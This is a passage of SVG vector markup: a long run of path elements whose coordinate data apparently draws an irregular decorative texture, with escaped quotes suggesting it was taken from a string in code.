d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path 